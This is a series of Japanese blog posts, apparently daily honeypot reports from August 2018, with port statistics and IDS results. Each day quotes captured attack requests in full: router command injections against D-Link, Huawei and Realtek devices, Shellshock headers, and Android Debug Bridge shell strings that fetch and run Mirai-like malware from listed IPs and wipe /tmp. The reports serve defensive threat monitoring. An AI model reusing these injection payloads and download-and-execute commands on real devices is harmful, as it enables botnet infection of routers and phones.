ハニーポット簡易分析(20日目:8/27)
8/27の分析となります。 先日、IDSである Suricataを導入しましたので、そちらの結果も記載しています(まだまだ、チューニングが必要ですが。。。)
8/27 Honeytrap分析結果
※なお、80ポートの通信は含まれていません。
検知数:7802件(データ部 0byte以上 3606件)
| ポート | 件数 | 割合 | サービス | 補足 |
| 445 | 1,992 | 47.95% | SMB | |
| 220 | 292 | 7.03% | IMAP3 |
コマンド:SSH-2.0-libssh2_1.4.3 |
| 1433 | 68 | 1.64% | Microsoft SQL Server | |
| 3389 | 57 | 1.37% | RDP | |
| 52869 | 51 | 1.23% | D-Link, Realtek SDK | マルウェアダウンロード |
| 22 | 48 | 1.16% | SSH | |
| 35928 | 42 | 1.01% | ? | マルウェアダウンロード |
| 81 | 41 | 0.99% | ? | |
| 3390 | 39 | 0.94% | ? | |
| 8080 | 36 | 0.87% | PROXY |
IDSの検知
※全ポートの通信を含んでいます。
| シグネチャ名 | 検知数 | 割合 |
| POLICY Cleartext WordPress Login | 6,301 | 99.31% |
| HTTP missing Host header | 43 | 0.68% |
| SMTP no server welcome message | 1 | 0.02% |
宛先ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://148.72.176[.]78/ngynx && sh ngynx`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176.32.32[.]156/bin && sh /tmp/bin`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176.32.33[.]171/kenjiro.mips && chmod 777 /tmp/kenjiro.mips/ && /tmp/kenjiro.mips`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp; >DIR & cd /var; >DIR; rm -rf *; wget hxxp://148.72.176[.]78/ken.sh; sh ken.sh`
宛先ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・$(busybox wget -g 168.235.82[.]217 -l /tmp/xDvAq -r mpswof ;chmod +x /tmp/xDvAq ;/tmp/xDvAq h)
宛先ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→mirai関連のマルウェア
POST /picsdesc.xml HTTP/1.1
・cd /tmp/;wget hxxp://80.211.47[.]28/jackmymips
・cd /tmp/;wget hxxp://159.65.232[.]56/xd.mips
・cd /tmp/;wget hxxp://107.191.99[.]41/elf.mips -O elf
・cd /tmp/;wget hxxp://142.93.1[.]75/hoho.mips -O hoho
・cd /tmp/;wget hxxp://167.99.228[.]78/ntpd.mips -O ntpd
・cd /tmp/;wget hxxp://167.99.228[.]78/8mips8.mips -O 8mips8
・cd /tmp/;wget hxxp://128.199.45[.]173/sora.mips -O sora.mips
宛先ポート:5555
①Android Debug Bridge に対する攻撃
CNXN............2...¼±§±host::.OPEN........Ý...&A..°¯º±shell:cd /data/local/tmp;wget hxxp://207.148.78.[.]52/br -O- >br;sh br;busybox wget hxxp://207.148.78[.]152/r -O- >r;sh r;curl hxxp://207.148.78.152/c >c;sh c;busybox curl hxxp://207.148.78[.]152/bc >bc;sh bc;rm -rf bc br r c;.
CNXN............2...¼±§±host::.OPEN)...........O/..°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27.102.115.[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27.102.115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2.
特段、傾向的に大きく変わったものはありませんでした。
IDSはデフォルトのまま導入していることもあり、チューニングしないと有効な分析は出来なさそうでした。現状は、Wordpressのログイン試行を大量に検知したことぐらいが分かるものでした。チューニングは9月ごろから本格的に実施出来ればと思っています。
以上、今回の簡易分析結果でした。
ハニーポット簡易分析(19日目:8/26)
8/26からHoneytrapのログが復活したので、Honeytrapの分析を行いたいと思います。
8/26 Honeytrap分析結果
検知数 6335件(データ部 0byte以上 3622件)
| ポート | 件数 | 割合 | サービス | 補足 |
| 445 | 1,781 | 49.16% | SMB | |
| 1433 | 70 | 1.93% | Microsoft SQL Server | |
| 3389 | 65 | 1.79% | RDP | |
| 52869 | 53 | 1.46% | D-Link, Realtek SDK | マルウェアダウンロード |
| 8888 | 51 | 1.41% | ? | |
| 81 | 49 | 1.35% | ? | |
| 8080 | 47 | 1.30% | PROXY | |
| 992 | 34 | 0.94% | TELNET protocol over TLS/SSL | |
| 500 | 33 | 0.91% | ipsec | |
| 19 | 32 | 0.88% | chargen |
宛先ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
POST /HNAP1/ HTTP/1.0
・wget hxxp://148[.]72[.]176[.]78/ngynx
・wget hxxp://176[.]32[.]32[.]156/bin
宛先ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・wget -g 31[.]220[.]43[.]190
宛先ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→ Mirai系マルウェア
POST /picdesc.xml HTTP/1.1
・wget hxxp://80[.]211[.]67[.]245/mips
・wget hxxp://159[.]65[.]232[.]56/xd.mips
・wget hxxp://107.191.99.41/elf.mips
・wget hxxp://167.99.228.78/ntpd.mips
・wget hxxp://128.199.45.173/sora.mips
宛先ポート:5555
①Android Debug Bridge に対する攻撃
CNXN............2...¼±§±host::.OPEN........Ý...&A..°¯º±shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;.
CNXN............2...¼±§±host::.OPEN)...........O/..°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2.
今回の分析は以上となります。最近、Suricataも導入したため、その結果も近日中に報告できればと思ってます(ただし、デフォルト設定で入れたため、有効な検知が少ないですが。。。)。
ハニーポット簡易分析(18日目:8/25)
Honeytrapのログがうまく取得出来ていなかった関係で WoWHoneypotの簡易分析となります。今回もApache Struts2 の脆弱性(CVE-2018-11776)(S2-057)は来ていませんでした。。。。8/25分のWoWHoneypotの簡易分析となります。
WoWHoneypotの分析(8/25)
検知数:180件
<検知パス一覧>
| URL パス | 概要 | マルウェア ダウンロード |
| / | インデックスファイルへのアクセス | × |
| /12.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /56.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /9678.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /PMA/index.php | 調査行為(DB関連) | × |
| /PMA2/index.php | 調査行為(DB関連) | × |
| /_query.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /admin/PMA/index.php | 調査行為(DB関連) | × |
| /admin/index.php | 調査行為(DB関連) | × |
| /admin/mysql/index.php | 調査行為(DB関連) | × |
| /admin/mysql2/index.php | 調査行為(DB関連) | × |
| /admin/phpMyAdmin/index.php | 調査行為(DB関連) | × |
| /admin/phpmyadmin2/index.php | 調査行為(DB関連) | × |
| /admin/zkyzp.jsp | PW・ID 共にadminでのアクセス | × |
| /ak.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /ak47.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /angge.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /aotu.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /aw.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /cainiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /claroline/phpMyAdmin/index.php | 調査行為(DB関連) | × |
| /cmd.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /cmdd.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /cmv.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /cmx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /conflg.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /data.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /db.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /db__.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /db_cts.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /db_pma.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /db_session.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /dbadmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /defect.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /desktop.ini.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /fack.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /favicon.ico | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /feixiang.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /fileserver/sex../../..%5Cadmin/zkyzp.jsp | PUTコマンドの試行 | × |
| /help.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /hh.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /hm.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /index.php | indexファイルへのアクセス | × |
| /infoo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /ip.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /java.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /l7.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /l8.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /lala-dpr.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /lindex.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /log.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://176[.]32[.]32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://199[.]195[.]254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
| /lol.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /manager/html | Tomcat管理マネージャーへのアクセス | × |
| /min.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /muhstik-dpr.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /muhstik.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /muhstik2.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /muhstiks.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /mx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /myadmin/index.php | 調査行為(DB関連) | × |
| /myadmin2/index.php | 調査行為(DB関連) | × |
| /mysql-admin/index.php | 調査行為(DB関連) | × |
| /mysql/index.php | 調査行為(DB関連) | × |
| /mysqladmin/index.php | 調査行為(DB関連) | × |
| /mz.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /pe.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /phpMyAdmin.old/index.php | 調査行為(DB関連) | × |
| /phpMyAdmin/index.php | 調査行為(DB関連) | × |
| /phpMyAdmin/phpMyAdmin/index.php | 調査行為(DB関連) | × |
| /phpMyAdminold/index.php | 調査行為(DB関連) | × |
| /phpMyadmin_bak/index.php | 調査行為(DB関連) | × |
| /phpadmin/index.php | 調査行為(DB関連) | × |
| /phpma/index.php | 調査行為(DB関連) | × |
| /phpmyadmin-old/index.php | 調査行為(DB関連) | × |
| /phpmyadmin0/index.php | 調査行為(DB関連) | × |
| /phpmyadmin1/index.php | 調査行為(DB関連) | × |
| /phpmyadmin2/index.php | 調査行為(DB関連) | × |
| /phpstudy.php | 調査行為(DB関連) | × |
| /pma-old/index.php | 調査行為(DB関連) | × |
| /pmamy/index.php | 調査行為(DB関連) | × |
| /pmamy2/index.php | 調査行為(DB関連) | × |
| /pmd/index.php | 調査行為(DB関連) | × |
| /q.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /qaq.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /qq.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /s.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /sheep.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /ssaa.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /system.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /test.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /text.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /tools/phpMyAdmin/index.php | 調査行為(DB関連) | × |
| /typo3/phpmyadmin/index.php | 調査行為(DB関連) | × |
| /uploader.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /w.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wanan.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wc.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /web/phpMyAdmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /webdav/ | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /webslee.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /weixiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wp-config.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wpo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wshell.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /wuwu11.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /www/phpMyAdmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /x.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xampp/phpmyadmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xiaoma.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xshell.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xw.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xw1.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /xx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /yao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /yumo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /z.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
| /zuoshou.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
<マルウェアダウンロード>
D-Linkの脆弱性を狙った攻撃を検知していますが、おそらくMirai系だと思います。時間があるときにここらのマルウェアは分析したいですね。
・wget hxxp://176[.]32[.]32[.]156/bin
→VirusTotal
・wget hxxp://199[.]195[.]254[.]118/dlink
・wget hxxp://209[.]141[.]33[.]86/d
→VirusTotal
以上、簡易分析となります。
ハニーポット簡易分析(17日目:8/24)
本来であれば、Honeytrapの分析を行う予定でしたが、なぜかログが取得出来ていなかったため、今回はWoWHoneypotの分析を行いました。
8/24 WoWHoneypot検知数 49件
| 接続先 | 概要 | 攻撃 |
| / | indexファイルへのアクセス | × |
| /index.php | indexファイルへのアクセス | × |
| /ipc$ | 調査行為 | × |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://176[.]32[.]32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 ※Hakai/2.0 |
○ |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ | D-Linkの脆弱性を狙った攻撃 ※Shinka/1.0 |
○ |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://212[.]237[.]32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ | D-Linkの脆弱性を狙った攻撃 ※LMAO/2.0 |
○ |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://50[.]115[.]166[.]136/hakai.mips%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 ※Hakai/2.0 |
○ |
マルウェアの分析は以下となります。
ダウンロード可能
・wget hxxp://176[.]32[.]32[.]156/bin →https://www.virustotal.com/#/file/fa588bdc625f5103d4960f5905a9b314a78de8dd35eccdf3e62ca52963148ee3/detection
ダウンロード不可
・wget hxxp://209[.]141[.]33[.]86/d
・wget hxxp://212[.]237[.]32[.]62/k
・wget hxxp://50.115.166.136/hakai.mips
今回は、Hakai 2.0 がダウンロード可能でした。Honeytrapと比較すると検知数は少ないですが、検知している通信が違うので、分析していて面白いですね。また、明日もHoneytrapのログは取れていないため、WoWHoneypotを分析する予定です。
以上、簡易分析となります。
ハニーポット簡易分析(16日目:8/23)
Apache Struts2 の脆弱性(CVE-2018-11776)(S2-057)が話題になっていますが、 23日時点ではまだ攻撃は観測できていませんでした。
早く観測できないかなーと思いつつ、8月23日分の分析を行います。
8/23 Honeytrap 分析
検知数 5583件 (データ有 3043件)
| 宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
| 445 | SMB | 1,627 | 53.47% | 調査行為 |
| 22 | SSH | 90 | 2.96% | 調査行為 |
| 1433 | Microsoft SQL Server | 67 | 2.20% | 調査行為 |
| 3389 | RDP | 54 | 1.77% | 調査行為 |
| 8088 | Asterisk (PBX) Web Configuration utility | 41 | 1.35% | /conf へのアクセス |
| 52869 | D-Link, Realtek SDK | 40 | 1.31% | マルウェアダウンロード |
| 81 | ? | 40 | 1.31% | 調査行為 |
| 993 | IMAPS | 38 | 1.25% | 調査行為 |
| 8000 | ? | 36 | 1.18% | 調査行為 |
| 2375 | Docker | 34 | 1.12% | 調査行為 |
マルウェアダウンロード:
ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
→
POST /HNAP1/ HTTP/1[.]0
SOAPAction: hxxp;//purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp;//176[.]32[.]32[.]156/bin && sh /tmp/bin`
ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1[.]1
wget -g 209[.]141[.]33[.]86
ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→ Mirai系マルウェア
POST /picsdesc[.]xml HTTP/1[.]1
・wget hxxp;//212[.]237[.]32[.]62/mips
・wget hxxp;//159[.]65[.]232[.]56/xd[.]mips
・wget hxxp;//167[.]99[.]14[.]199/bogan[.]mips
・wget hxxp;//107[.]191[.]99[.]41/elf[.]mips
・wget hxxp;//142[.]93[.]1[.]75/hoho[.]mips
ポート:8080
① Shell Shock の脆弱性を狙った攻撃
GET /cgi-bin/authLogin[.]cgi HTTP/1[.]1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0[.]sh && /bin/mkdir -p /share/HDB_DATA/[.][.][.]/php && /usr/bin/wget -c hxxp;//185[.]14[.]30[.]79/S0[.]sh -P /tmp && /bin/sh /tmp/S0[.]sh 0<&1 2>&1
②D-Linkのルータの脆弱性を狙った攻撃
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp;//209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/[.]shinka;sh%20/tmp/[.]shinka%27$ HTTP/1[.]1
ポート 5555
①Android Debug Bridge に対する攻撃
CNXN ¼±§±host:: OPEN Ý °¯º±shell:cd /data/local/tmp;wget hxxp;//207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp;//207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp;//207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp;//207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]
CNXN ¼±§±host:: OPEN Ý °¯º°¯º±shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp;//185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp;//185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2[.]
CNXN ¼±§±host:: OPEN Ý °¯º°¯º±shell:cd /data/local/tmp/; busybox wget hxxp;//27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp;//27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]
今回の分析は以上となります。
ハニーポット簡易分析(14,15日目:8/21,22)
今回は二日分まとめての更新となります。
8月21日
検知数 6,679 件
<0Byte以上の宛先ポート TOP10>
| 宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
| 445 | SMB | 1,587 | 42.15% | 調査行為 |
| 503 | intrinsa | 254 | 6.75% | 調査行為 |
| 3389 | RDP | 76 | 2.02% | 調査行為 |
| 1433 | Microsoft SQL Server | 75 | 1.99% | 調査行為 |
| 52869 | D-Link, Realtek SDK | 46 | 1.22% | マルウェアダウンロード |
| 8080 | PROXY | 43 | 1.14% | 調査行為 |
| 8088 | Asterisk (PBX) Web Configuration utility | 40 | 1.06% | /conf へのアクセス |
| 8089 | ? | 34 | 0.90% | 調査行為 |
| 4369 | ? | 33 | 0.88% | 調査行為 |
| 83 | MIT ML Device | 33 | 0.88% | 調査行為 |
8月22日
検知数 6,734 件
<0Byte以上の宛先ポート TOP10>
| 宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
| 445 | SMB | 1,493 | 35.31% | 調査行為 |
| 22 | SSH | 457 | 10.81% | 調査行為 |
| 1433 | Microsoft SQL Server | 99 | 2.34% | 調査行為 |
| 8080 | PROXY | 57 | 1.35% | 調査行為 |
| 3389 | RDP | 51 | 1.21% | 調査行為 |
| 8088 | Asterisk (PBX) Web Configuration utility | 50 | 1.18% | /conf へのアクセス |
| 8081 | D-Link | 46 | 1.09% | マルウェアダウンロード |
| 81 | ? | 34 | 0.80% | 調査行為 |
| 3790 | quickbooksrds | 33 | 0.78% | 調査行為 |
| 21 | FTP | 32 | 0.76% | 調査行為 |
503ポートへのアクセスが増加しましたが、攻撃と思われるコードはないため、調査行為止まりの通信でした。
<マルウェアダウンロード>
①
POST /HNAP1/ HTTP/1[.]0
・wget hxxp://176[.]32[.]32[.]156/bin
・wget hxxp://50[.]115[.]166[.]136/bin
→Mirai系マルウェア
②
POST /ctrlt/DeviceUpgrade_1 HTTP/1[.]1
・wget -g 209[.]141[.]33[.]86
・wget hxxp://80[.]211[.]112[.]95/sensi[.]sh
→Mirai系マルウェア
③
POST /picsdesc[.]xml HTTP/1[.]1
・wget hxxp://80[.]211[.]67[.]245/mips
・wget hxxp://159[.]65[.]232[.]56/xd[.]mips
・wget hxxp://80[.]211[.]112[.]150/mips
・wget hxxp://107[.]191[.]99[.]41/elf[.]mips
・wget hxxp://142[.]93[.]1[.]75/hoho[.]mips
・wget hxxp://209[.]97[.]143[.]112/bins/sora[.]mips
→Mirai系マルウェア
④
POST /wanipcn[.]xml HTTP/1[.]1
・wget hxxp://80[.]211[.]112[.]150/mips
→Mirai系マルウェア
⑤
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1[.]1
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/xb;sh%20/tmp/xb%27$ HTTP/1[.]1
→Mirai系マルウェアと推測
⑥
・shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp://185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2[.]
・shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs[.]
→リンク先ダウンロード不可
マルウェアの傾向も変わっておらず、基本的にはMirai系のマルウェアとなります。
以上、簡易分析となります。
ハニーポット簡易分析(13日目:8/20)
ちょっと、前の解析となりますが、8月20日の解析結果となります。今日は頑張って、昨日分まで出来ればと思っています。
マルウェアも一部ダウンロード可能なものがあったため、時間があるときにできるとことまで、解析出来ればと思っています。
Honeytrap(2018/8/20)
検知数:6750件(0byte以上 3623件)
| 宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
| 445 | SMB | 1,695 | 46.78% | 調査行為 |
| 3389 | RDP | 465 | 12.84% | 調査行為 |
| 1433 | Microsoft SQL Server | 71 | 1.96% | 調査行為 |
| 52869 | D-Link, Realtek SDK | 61 | 1.68% | マルウェアダウンロード |
| 22 | SSH | 53 | 1.46% | 調査行為 |
| 8088 | Asterisk (PBX) Web Configuration utility | 44 | 1.21% | /conf へのアクセス |
| 8087 | ? | 33 | 0.91% | 調査行為 |
| 5094 | ? | 32 | 0.88% | 調査行為 |
| 161 | SNMP | 32 | 0.88% | 調査行為 |
| 32764 | ? | 32 | 0.88% |
調査行為 |
宛先ポートの傾向に大きな変化はありませんでした。マルウェアダウンロードについては一部のURLが調査時点では生きている状態でした。
<マルウェアダウンロード>
ポート:52869
→Mirai関連のマルウェア
POST /picsdesc.xml HTTP/1.1
・wget hxxp://159[.]65[.]232[.]56/xd.mips
・wget hxxp://107[.]191[.]99[.]41/elf.mips
・wget hxxp://80[.]211[.]112[.]150/mips
・wget hxxp://142[.]93[.]1[.]75/hoho.mips
ポート:5555
→VTに登録なし
・shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs.
ポート:8081
→Mirai関連のマルウェア
POST /HNAP1/ HTTP/1.0
・wget hxxp://50[.]115[.]166[.]136/bin
ポート:37215
→Mirai関連のマルウェア
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・wget 209[.]141[.]33[.]86
・wget hxxp://80[.]211[.]112[.]95/sensi.sh
以上、簡易分析となります。
